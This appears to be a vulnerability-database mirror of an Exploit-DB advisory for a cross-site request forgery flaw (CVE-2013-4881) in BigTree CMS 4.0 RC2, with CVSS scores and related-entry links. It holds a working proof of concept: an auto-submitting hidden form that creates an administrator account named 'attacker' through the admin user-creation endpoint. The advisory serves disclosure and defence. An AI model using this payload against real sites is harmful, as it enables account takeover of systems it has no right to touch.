Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
exploitdbHigh-Tech BridgeEDB-ID:38690
HistoryJul 17, 2013 - 12:00 a.m.

BigTree CMS Cross Site Request Forgery Vulnerability

2013-07-1700:00:00
High-Tech Bridge
www.exploit-db.com
29

6.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

0.002 Low

EPSS

Percentile

59.2%

JSON

BigTree CMS Cross Site Request Forgery Vulnerability. CVE-2013-4881. Webapps exploit for php platform

source: http://www.securityfocus.com/bid/61702/info

BigTree CMS is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions and gain access to the affected application. Other attacks are also possible.

BigTree CMS 4.0 RC2 is vulnerable; other versions may also be affected. 

<form action="http://www.example.com/site/index.php/admin/users/create/" method="post" name="main">
<input type="hidden" name="email" value="[email protected]">
<input type="hidden" name="password" value="password">
<input type="hidden" name="level" value="1">
<input type="hidden" name="name" value="attacker">
<input type="hidden" name="company" value="company">
<input type="submit" id="btn">
</form>
<script>
document.main.submit();
</script>

Related

prion 1
cve 1
securityvulns 1
packetstorm 1
exploitpack 1
htbridge 1
openvas 1
exploitdb 1
prion
prion
Cross site request forgery (csrf)
2013-08-19 13:07:00
cve
cve
CVE-2013-4881
2013-08-19 13:07:00
securityvulns
securityvulns
Multiple Vulnerabilities in BigTree CMS
2013-09-09 00:00:00
packetstorm
packetstorm
BigTree CMS 4.0 RC2 XSS / CSRF / SQL Injection
2013-08-08 00:00:00
exploitpack
exploitpack
BigTree CMS 4.0 RC2 - Multiple Vulnerabilities
2013-08-08 00:00:00
htbridge
htbridge
Multiple Vulnerabilities in BigTree CMS
2013-07-17 00:00:00
openvas
openvas
BigTree CMS Multiple Vulnerabilities
2013-08-19 00:00:00
exploitdb
exploitdb
BigTree CMS 4.0 RC2 - Multiple Vulnerabilities
2013-08-08 00:00:00

6.8 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

0.002 Low

EPSS

Percentile

59.2%

JSON
Related for EDB-ID:38690
prion1cve1securityvulns1packetstorm1exploitpack1htbridge1openvas1exploitdb1